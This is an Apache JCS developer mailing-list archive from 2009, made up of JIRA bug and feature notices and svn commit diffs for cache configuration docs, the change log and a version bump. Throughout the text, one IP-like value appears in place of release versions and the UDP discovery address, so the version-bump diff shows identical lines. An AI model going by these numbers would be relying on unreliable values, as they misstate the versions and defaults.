----------------------- > > Key: JCS-20 > URL: https://issues.apache.org/jira/browse/JCS-20 > Project: JCS > Issue Type: Bug > Components: JDBC Disk Cache > Reporter: Alistair Forbes > Assignee: Aaron Smuts > Priority: Minor > Attachments: JDBCDiskCache.diff > > > Incorrect SQL generated in JDBCDiskCache.java when clear a region. > When clearing a cache with a key ending with a colon, the SQL has the syntax "where xxx = like 'key:'". The = causes an SQL syntax error. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:19:07 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31830 invoked from network); 23 Jul 2009 19:19:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:19:07 -0000 Received: (qmail 69187 invoked by uid 500); 23 Jul 2009 19:20:12 -0000 Delivered-To: [email protected] Received: (qmail 69160 invoked by uid 500); 23 Jul 2009 19:20:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69150 invoked by uid 500); 23 Jul 2009 19:20:12 -0000 Delivered-To: [email protected] Received: (qmail 69147 invoked by uid 500); 23 Jul 2009 19:20:12 -0000 Delivered-To: [email protected] Received: (qmail 69144 invoked by uid 99); 23 Jul 2009 19:20:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:20:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:20:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 2E226238884C; Thu, 23 Jul 2009 19:19:50 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797196 - in /jakarta/jcs/trunk: src/java/org/apache/jcs/utils/config/PropertySetter.java xdocs/LateralTCPProperties.xml xdocs/changes.xml Date: Thu, 23 Jul 2009 19:19:49 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 23 19:19:49 2009 New Revision: 797196 URL: http://svn.apache.org/viewvc?rev=797196&view=rev Log: fixing JCS-53: default properties should now work. updating change log Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/config/PropertySetter.java jakarta/jcs/trunk/xdocs/LateralTCPProperties.xml jakarta/jcs/trunk/xdocs/changes.xml Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/config/PropertySetter.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/config/PropertySetter.java?rev=797196&r1=797195&r2=797196&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/config/PropertySetter.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/config/PropertySetter.java Thu Jul 23 19:19:49 2009 @@ -112,7 +112,7 @@ { int len = prefix.length(); - for ( Enumeration e = properties.keys(); e.hasMoreElements(); ) + for ( Enumeration e = properties.propertyNames(); e.hasMoreElements(); ) { String key = (String) e.nextElement(); Modified: jakarta/jcs/trunk/xdocs/LateralTCPProperties.xml URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/xdocs/LateralTCPProperties.xml?rev=797196&r1=797195&r2=797196&view=diff ============================================================================== --- jakarta/jcs/trunk/xdocs/LateralTCPProperties.xml (original) +++ jakarta/jcs/trunk/xdocs/LateralTCPProperties.xml Thu Jul 23 19:19:49 2009 @@ -1,151 +1,132 @@ <?xml version="1.0"?> -<!-- - Licensed to the Apache Software Foundation (ASF) under one - or more contributor license agreements. See the NOTICE file - distributed with this work for additional information - regarding copyright ownership. The ASF licenses this file - to you under the Apache License, Version 2.0 (the - "License"); you may not use this file except in compliance - with the License. You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, - software distributed under the License is distributed on an - "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY - KIND, either express or implied. See the License for the - specific language governing permissions and limitations - under the License. ---> - + <!-- + Licensed to the Apache Software Foundation (ASF) under one or more + contributor license agreements. See the NOTICE file distributed with + this work for additional information regarding copyright ownership. + The ASF licenses this file to you under the Apache License, Version + 2.0 (the "License"); you may not use this file except in compliance + with the License. You may obtain a copy of the License at + http://www.apache.org/licenses/LICENSE-2.0 Unless required by + applicable law or agreed to in writing, software distributed under the + License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR + CONDITIONS OF ANY KIND, either express or implied. See the License for + the specific language governing permissions and limitations under the + License. + --> <document> - <properties> - <title>Lateral TCP Auxiliary Cache Configuration</title> - <author email="[email protected]">Aaron Smuts</author> - </properties> - - <body> - <section name="Lateral TCP Auxiliary Cache Configuration"> - - <p> - The following properties apply to the TCP Lateral Cache plugin. - </p> - - <subsection name="TCP Configuration Properties"> - <table> - <tr> - <th>Property</th> - <th>Description</th> - <th>Required</th> - <th>Default Value</th> - </tr> - <tr> - <td>TcpServers</td> - <td> - This is the list of servers this cache should try to connect to. - With UDP discovery this is not necessary. - </td> - <td>N</td> - <td>none</td> - </tr> - <tr> - <td>TcpListenerPort</td> - <td> - This is the port this cache should listen on. - </td> - <td>Y</td> - <td>n/a</td> - </tr> - <tr> - <td>AllowGet</td> - <td> - Should this cache be allowed to get from other laterals. False means - that it can only put, i.e. send updates and remove requests to other laterals. - Lateral gets are not recommended for performance reasons. This used to be - controlled by the attribute PutOnlyMode. - </td> - <td>N</td> - <td>true</td> - </tr> - <tr> - <td>Receive</td> - <td> - Should this cache receive or only send to other laterals. You may want to - set receive to false if you just need to broadcast to other caches. If you - have a feed data parser, that doesn't need to receive updates, but you - do want it to send invalidation messages, then you would set receive to false. - If receive is false, the discovery service, if enabled, will only listen. - </td> - <td>N</td> - <td>true</td> - </tr> - <tr> - <td>IssueRemoveOnPut</td> - <td> - If this is set to true, then the lateral client will send a remove command - rather than a put command to any registered listeners. - </td> - <td>N</td> - <td>false</td> - </tr> - <tr> - <td>FilterRemoveByHashCode</td> - <td> - If this is true, and IssueRemoveOnPut is true, the client - will include the hashCode of the element to remove. If it is also true - on the receiving end, the receiver will check to see if the element exists. - If the element exists, and the hashCodes are the same, the item will not be - removed. - </td> - <td>N</td> - <td>false</td> - </tr> - <tr> - <td>SocketTimeOut</td> - <td> - This allows you to set the socket (read) timeout. - </td> - <td>N</td> - <td>1000</td> - </tr> - <tr> - <td>OpenTimeOut</td> - <td> - This allows you to set the socket open timeout. - </td> - <td>N</td> - <td>2000</td> - </tr> - <tr> - <td>UdpDiscoveryAddr</td> - <td> - The address the UDP discovery process should broadcast messages to. - </td> - <td>N</td> - <td>161.129.204.104</td> - </tr> - <tr> - <td>UdpDiscoveryPort</td> - <td> - The port the UDP discovery process should send messages to. - </td> - <td>N</td> - <td>6789</td> - </tr> - <tr> - <td>UdpDiscoveryEnabled</td> - <td> - Whether or not the UDP discovery service should be used to - locate other lateral caches. - </td> - <td>N</td> - <td>true</td> - </tr> - </table> - </subsection> - - <subsection name="Example Configuration"> - <source><![CDATA[ + <properties> + <title>Lateral TCP Auxiliary Cache Configuration</title> + <author email="[email protected]">Aaron Smuts</author> + </properties> + <body> + <section name="Lateral TCP Auxiliary Cache Configuration"> + <p> The following properties apply to the TCP Lateral Cache plugin. + </p> + <subsection name="TCP Configuration Properties"> + <table> + <tr> + <th>Property</th> + <th>Description</th> + <th>Required</th> + <th>Default Value</th> + </tr> + <tr> + <td>TcpServers</td> + <td> This is the list of servers this cache should try to connect + to. With UDP discovery this is not necessary.</td> + <td>N</td> + <td>none</td> + </tr> + <tr> + <td>TcpListenerPort</td> + <td> This is the port this cache should listen on.</td> + <td>Y</td> + <td>n/a</td> + </tr> + <tr> + <td>AllowGet</td> + <td> Should this cache be allowed to get from other laterals. + False means that it can only put, i.e. send updates and remove + requests to other laterals. Lateral gets are not recommended for + performance reasons. This used to be controlled by the attribute + PutOnlyMode.</td> + <td>N</td> + <td>true</td> + </tr> + <tr> + <td>Receive</td> + <td> Should this cache receive or only send to other laterals. You + may want to set receive to false if you just need to broadcast to + other caches. If you have a feed data parser, that doesn't need + to receive updates, but you do want it to send invalidation + messages, then you would set receive to false. If receive is + false, the discovery service, if enabled, will only listen.</td> + <td>N</td> + <td>true</td> + </tr> + <tr> + <td>IssueRemoveOnPut</td> + <td> If this is set to true, then the lateral client will send a + remove command rather than a put command to any registered + listeners.</td> + <td>N</td> + <td>false</td> + </tr> + <tr> + <td>FilterRemoveByHashCode</td> + <td> If this is true, and IssueRemoveOnPut is true, the client + will include the hashCode of the element to remove. If it is also + true on the receiving end, the receiver will check to see if the + element exists. If the element exists, and the hashCodes are the + same, the item will not be removed.</td> + <td>N</td> + <td>false</td> + </tr> + <tr> + <td>SocketTimeOut</td> + <td> This allows you to set the socket (read) timeout.</td> + <td>N</td> + <td>1000</td> + </tr> + <tr> + <td>OpenTimeOut</td> + <td> This allows you to set the socket open timeout.</td> + <td>N</td> + <td>2000</td> + </tr> + <tr> + <td>UdpDiscoveryAddr</td> + <td> The address the UDP discovery process should broadcast + messages to.</td> + <td>N</td> + <td>161.129.204.104</td> + </tr> + <tr> + <td>UdpDiscoveryPort</td> + <td> The port the UDP discovery process should send messages to. + </td> + <td>N</td> + <td>6789</td> + </tr> + <tr> + <td>UdpDiscoveryEnabled</td> + <td> Whether or not the UDP discovery service should be used to + locate other lateral caches.</td> + <td>N</td> + <td>true</td> + </tr> + <tr> + <td>ZombieQueueMaxSize</td> + <td> The number of elements the zombie queue will hold. This queue + is used to store events if we lose our connection with the + server.</td> + <td>N</td> + <td>1000</td> + </tr> + </table> + </subsection> + <subsection name="Example Configuration"> + <source><![CDATA[ jcs.auxiliary.LTCP=org.apache.jcs.auxiliary.lateral.socket.tcp.LateralTCPCacheFactory jcs.auxiliary.LTCP.attributes=org.apache.jcs.auxiliary.lateral.socket.tcp.TCPLateralCacheAttributes #jcs.auxiliary.LTCP.attributes.TcpServers= @@ -159,9 +140,9 @@ jcs.auxiliary.LTCP.attributes.FilterRemoveByHashCode=false jcs.auxiliary.LTCP.attributes.SocketTimeoOt=1001 jcs.auxiliary.LTCP.attributes.OpenTimeOut=2002 +jcs.auxiliary.LTCP.attributes.ZombieQueueMaxSize=2000 ]]></source> - </subsection> - - </section> - </body> -</document> + </subsection> + </section> + </body> +</document> \ No newline at end of file Modified: jakarta/jcs/trunk/xdocs/changes.xml URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/xdocs/changes.xml?rev=797196&r1=797195&r2=797196&view=diff ============================================================================== --- jakarta/jcs/trunk/xdocs/changes.xml (original) +++ jakarta/jcs/trunk/xdocs/changes.xml Thu Jul 23 19:19:49 2009 @@ -19,11 +19,19 @@ <author email="[email protected]">Aaron Smuts</author> </properties> <body> - <release version="forthcoming" date="in SVN"> + <release version="161.129.204.104" date="2009-07-23" description="tempbuild"> + <action dev="asmuts" type="update">TCP Lateral now uses a queuing + zombie service during recovery.</action> + <action dev="asmuts" type="update">Refactored UDP Discovery. + </action> <action dev="asmuts" type="fix" issue="JCS-60">Slots for same key updates now get added to the recycle bin.</action> - <action dev="asmuts" type="update">Caught Throwable in - JDBC disk cache shrinker, so it won't die.</action> + <action dev="asmuts" type="update" issue="JCS-58">Added File Disk + Cache.</action> + <action dev="asmuts" type="fix" issue="JCS-53">Default + properties should now work.</action> + <action dev="asmuts" type="update">Caught Throwable in JDBC disk + cache shrinker, so it won't die.</action> </release> <release version="161.129.204.104" date="2009-06-11" description="tempbuild"> <action dev="asmuts" type="update">Added a compressing serializer. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:19:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31882 invoked from network); 23 Jul 2009 19:19:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:19:32 -0000 Received: (qmail 69350 invoked by uid 500); 23 Jul 2009 19:20:37 -0000 Delivered-To: [email protected] Received: (qmail 69288 invoked by uid 500); 23 Jul 2009 19:20:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69276 invoked by uid 99); 23 Jul 2009 19:20:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:20:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:20:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3C89B234C046 for <[email protected]>; Thu, 23 Jul 2009 12:20:15 -0700 (PDT) Message-ID: <1259793973.1248376815232.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:20:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-50) 3 new memory caches In-Reply-To: <938496952.1220784104288.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-50?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-50. -------------------------- Resolution: Fixed > 3 new memory caches > ------------------- > > Key: JCS-50 > URL: https://issues.apache.org/jira/browse/JCS-50 > Project: JCS > Issue Type: Improvement > Components: Composite Cache > Affects Versions: jcs-1.4-dev > Environment: current jcs trunk > Reporter: Maxim Gordienko > Assignee: Aaron Smuts > Attachments: 0001-refactored-memory-cache-hierarchy.patch, 0002-improve-performance-or-MRU-list.patch, 0003-added-new-structure-PriorityList.patch, 0004-added-new-FIFO-memory-cache.patch, 0005-added-LFU-memory-cache.patch, 0006-added-Expiration-memory-cache.patch > > > This is a refactoring/reformat of patch introduced in JCS-43. > Patch is splitted in 6 parts > 1) refactoring memory caches to achieve higher code reuse > 2) refactoring MRU cache to use double linked list instead of LinkedList > 3) introduction of new PriorityList structure > 4-6) new caches FIFO, LFU, Expiration -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:19:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31896 invoked from network); 23 Jul 2009 19:19:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:19:32 -0000 Received: (qmail 69416 invoked by uid 500); 23 Jul 2009 19:20:37 -0000 Delivered-To: [email protected] Received: (qmail 69386 invoked by uid 500); 23 Jul 2009 19:20:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69286 invoked by uid 99); 23 Jul 2009 19:20:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:20:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:20:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4F5A7234C053 for <[email protected]>; Thu, 23 Jul 2009 12:20:15 -0700 (PDT) Message-ID: <577914095.1248376815324.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:20:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-55) Custom serializaer is not always used In-Reply-To: <1791413625.1232602559738.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-55?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-55. -------------------------- Resolution: Fixed > Custom serializaer is not always used > ------------------------------------- > > Key: JCS-55 > URL: https://issues.apache.org/jira/browse/JCS-55 > Project: JCS > Issue Type: Bug > Components: Indexed Disk Cache > Reporter: Alexander Sofronov > Assignee: Aaron Smuts > > I'm trying to use indexed disk cache with custom serializer feature. I added the following line to my cache.ccf: > jcs.auxiliary.DC.serializer=mypackage.MySerializer > I see that my serializer is used for serializing only, deSerialize method is never called. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:23:30 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33481 invoked from network); 23 Jul 2009 19:23:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:23:29 -0000 Received: (qmail 76832 invoked by uid 500); 23 Jul 2009 19:24:34 -0000 Delivered-To: [email protected] Received: (qmail 76801 invoked by uid 500); 23 Jul 2009 19:24:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 76791 invoked by uid 500); 23 Jul 2009 19:24:34 -0000 Delivered-To: [email protected] Received: (qmail 76788 invoked by uid 500); 23 Jul 2009 19:24:34 -0000 Delivered-To: [email protected] Received: (qmail 76785 invoked by uid 99); 23 Jul 2009 19:24:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:24:34 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:24:32 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 92261238884C; Thu, 23 Jul 2009 19:24:12 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797199 - in /jakarta/jcs/trunk: pom.xml project.xml Date: Thu, 23 Jul 2009 19:24:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 23 19:24:12 2009 New Revision: 797199 URL: http://svn.apache.org/viewvc?rev=797199&view=rev Log: Increasing version to 161.129.204.104-RC before tag Modified: jakarta/jcs/trunk/pom.xml jakarta/jcs/trunk/project.xml Modified: jakarta/jcs/trunk/pom.xml URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/pom.xml?rev=797199&r1=797198&r2=797199&view=diff ============================================================================== --- jakarta/jcs/trunk/pom.xml (original) +++ jakarta/jcs/trunk/pom.xml Thu Jul 23 19:24:12 2009 @@ -36,7 +36,7 @@ <groupId>org.apache.jcs</groupId> <artifactId>jcs</artifactId> <packaging>pom</packaging> - <version>161.129.204.104-RC</version> + <version>161.129.204.104-RC</version> <name>Jakarta JCS</name> <url>http://jakarta.apache.org/jcs/</url> <inceptionYear>2002</inceptionYear> Modified: jakarta/jcs/trunk/project.xml URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/project.xml?rev=797199&r1=797198&r2=797199&view=diff ============================================================================== --- jakarta/jcs/trunk/project.xml (original) +++ jakarta/jcs/trunk/project.xml Thu Jul 23 19:24:12 2009 @@ -17,7 +17,7 @@ <pomVersion>3</pomVersion> <name>JCS</name> <id>jcs</id> - <currentVersion>161.129.204.104-RC</currentVersion> + <currentVersion>161.129.204.104-RC</currentVersion> <organization> <name>Apache Software Foundation</name> <url>http://jakarta.apache.org/</url> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:26:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34438 invoked from network); 23 Jul 2009 19:26:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:26:23 -0000 Received: (qmail 81986 invoked by uid 500); 23 Jul 2009 19:27:29 -0000 Delivered-To: [email protected] Received: (qmail 81949 invoked by uid 500); 23 Jul 2009 19:27:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 81939 invoked by uid 500); 23 Jul 2009 19:27:29 -0000 Delivered-To: [email protected] Received: (qmail 81936 invoked by uid 500); 23 Jul 2009 19:27:29 -0000 Delivered-To: [email protected] Received: (qmail 81933 invoked by uid 99); 23 Jul 2009 19:27:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:27:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:27:27 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B2984238884C; Thu, 23 Jul 2009 19:27:06 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797201 - /jakarta/jcs/tags/JCS_1_3_3_3/ Date: Thu, 23 Jul 2009 19:27:06 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 23 19:27:06 2009 New Revision: 797201 URL: http://svn.apache.org/viewvc?rev=797201&view=rev Log: TCP Lateral now uses a queuing zombie service during recovery. | Refactored UDP Discovery. | Slots for same key updates now get added to the disk recycle bin. | Added File Disk Cache. | Default properties should now work. | Caught Throwable in JDBC disk cache shrinker, so it won't die. Added: jakarta/jcs/tags/JCS_1_3_3_3/ - copied from r797200, jakarta/jcs/trunk/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:34:30 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40367 invoked from network); 23 Jul 2009 19:34:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:34:30 -0000 Received: (qmail 3041 invoked by uid 500); 23 Jul 2009 19:35:35 -0000 Delivered-To: [email protected] Received: (qmail 3014 invoked by uid 500); 23 Jul 2009 19:35:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 3004 invoked by uid 500); 23 Jul 2009 19:35:35 -0000 Delivered-To: [email protected] Received: (qmail 3001 invoked by uid 500); 23 Jul 2009 19:35:35 -0000 Delivered-To: [email protected] Received: (qmail 2998 invoked by uid 99); 23 Jul 2009 19:35:35 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:35:35 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:35:32 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B8D79238884C; Thu, 23 Jul 2009 19:35:11 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797203 - /jakarta/jcs/tempbuilds/jcs-161.129.204.104-RC.jar Date: Thu, 23 Jul 2009 19:35:11 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 23 19:35:11 2009 New Revision: 797203 URL: http://svn.apache.org/viewvc?rev=797203&view=rev Log: TCP Lateral now uses a queuing zombie service during recovery. | Refactored UDP Discovery. | Slots for same key updates now get added to the disk recycle bin. | Added File Disk Cache. | Default properties should now work. | Caught Throwable in JDBC disk cache shrinker, so it won't die. Added: jakarta/jcs/tempbuilds/jcs-161.129.204.104-RC.jar (with props) Added: jakarta/jcs/tempbuilds/jcs-161.129.204.104-RC.jar URL: http://svn.apache.org/viewvc/jakarta/jcs/tempbuilds/jcs-161.129.204.104-RC.jar?rev=797203&view=auto ============================================================================== Binary file - no diff available. Propchange: jakarta/jcs/tempbuilds/jcs-161.129.204.104-RC.jar ------------------------------------------------------------------------------ svn:mime-type = application/octet-stream --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 04:47:26 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11499 invoked from network); 28 Jul 2009 04:47:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 04:47:25 -0000 Received: (qmail 18158 invoked by uid 500); 28 Jul 2009 04:48:39 -0000 Delivered-To: [email protected] Received: (qmail 18001 invoked by uid 500); 28 Jul 2009 04:48:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 17619 invoked by uid 99); 28 Jul 2009 04:48:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 04:48:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 04:48:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A1F05234C4C3 for <[email protected]>; Mon, 27 Jul 2009 21:48:15 -0700 (PDT) Message-ID: <1979731257.1248756495662.JavaMail.jira@brutus> Date: Mon, 27 Jul 2009 21:48:15 -0700 (PDT) From: "senthilmohan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (JCS-64) Clarification on JCS compatibility nature with JDK MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Clarification on JCS compatibility nature with JDK --------------------------------------------------- Key: JCS-64 URL: https://issues.apache.org/jira/browse/JCS-64 Project: JCS Issue Type: Question Affects Versions: jcs-1.3 Environment: Solaris platform with JDK 1.4.2_19 Reporter: senthilmohan Assignee: Aaron Smuts Hi , We have an application which uses JCS1.0.Our application is in JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify below few things regarding this JCS compatibility nature. 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported with this combination? 2. What is the compatible JDK version for JCS 1.3 ? 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, 